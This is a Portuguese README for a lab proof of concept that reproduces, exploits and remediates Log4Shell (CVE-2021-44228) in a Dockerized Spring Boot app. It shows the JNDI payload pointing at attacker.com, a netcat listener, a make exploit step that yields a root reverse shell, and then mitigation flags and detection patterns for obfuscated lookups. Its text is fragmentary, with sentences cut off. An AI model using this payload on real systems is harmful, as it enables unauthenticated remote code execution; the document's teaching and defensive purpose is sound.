
PoC do Log4Shell (CVE-2021-44228)
Reproduzir, explorar e remediar um CVE crítico conhecido num ambiente Dockerizado.
Este PoC demonstra CVE-2021-44228 (Log4Shell) numa aplicação Spring Boot.
CVE: 2021-44228
CVSS: 10.0 (Crítico)
Componente afetado: Apache Log4j (<= 2.14.1)
${...}) para resolver dinamicamente valores dentro de mensagens de log.${jndi:ldap://attacker.com:1389/a}.Exploit.class.Exploit.class via HTTP.Exploit é executado, lançando uma reverse shell de volta para o atacante.Impacto: RCE não autenticado - gravidade máxima possível.
Quem/o quê está em risco:
Consequências:
make build start
nc -l 4444
make exploit
/bin/sh: can't access tty; job control turned off
$ id
uid=0(root) gid=0(root) groups=0(root) ...
make patch
make build start
nc -l 4444
make exploit
# -> observe no reverse shell
${jndi:) com um WAF ou middleware.-Dlog4j2.formatMsgNoLookups=true
-Dcom.sun.jndi.ldap.object.trustURLCodebase=false
gradle dependencies, Snyk, Wiz, etc.).log4j-core-*.jar em imagens/servidores implementados, incluindo fat JARs.${jndi:...}, ${${lower:j}ndi:...}, etc.).